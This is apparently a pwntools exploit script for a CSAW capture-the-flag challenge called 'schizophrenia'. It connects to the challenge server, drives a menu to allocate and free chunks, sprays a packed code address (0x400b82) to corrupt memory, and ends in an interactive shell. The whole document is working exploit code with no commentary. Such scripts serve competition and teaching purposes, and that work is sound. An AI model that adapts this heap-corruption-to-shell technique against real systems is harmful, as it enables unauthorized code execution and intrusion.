from pwn import * pe=remote("pwn.chal.csaw.io",10108) #pe = process('./schizophrenia') print(pe.sendline("1")) print(pe.recvline()) print(pe.sendline("0")) print(pe.recvline()) print(pe.sendline("thing")) print(pe.recvline()) import time print(time.sleep(.1)) print(pe.sendline("1")) print(pe.recvline()) print(pe.sendline("1")) print(pe.recvline()) print(pe.sendline("voice")) print(pe.recvline()) print(pe.sendline("512")) print(pe.recvline()) pe.sendline("\x82\x0b\x40\x00\x00\x00\x00\x00"*(500/8)) #print(pe.sendline("AAAAAAAA"*(500/8))) print(pe.recvline()) print(time.sleep(.1)) print(pe.sendline("2")) print(pe.recvline()) print(pe.sendline("1")) print(pe.recvline()) print(time.sleep(.1)) print(pe.sendline("1")) print(pe.recvline()) print(pe.sendline("1")) print(pe.recvline()) print(pe.sendline("voice")) print(pe.recvline()) print(pe.sendline("32")) print(pe.recvline()) print(pe.sendline("\x82\x0b\x40\x00\x00\x00\x00\x00"*3)) #print(pe.sendline("AAAAAAAA"*3)) print(pe.recvline()) print(time.sleep(.1)) print(pe.sendline("2")) print(pe.recvline()) print(pe.sendline("1")) print(pe.recvline()) print(time.sleep(.1)) print(pe.sendline("1")) print(pe.recvline()) print(pe.sendline("1")) print(pe.recvline()) print(pe.sendline("thing")) print(pe.recvline()) print(time.sleep(.1)) print(pe.sendline("1")) print(pe.recvline()) print(pe.sendline("2")) print(pe.recvline()) print(pe.sendline("thing")) print(pe.recvline()) print(time.sleep(.1)) print(pe.sendline("1")) print(pe.recvline()) print(pe.sendline("3")) print(pe.recvline()) print(pe.sendline("thing")) print(pe.recvline()) print(time.sleep(.1)) print(pe.sendline("3")) print(pe.sendline("3")) print(pe.interactive())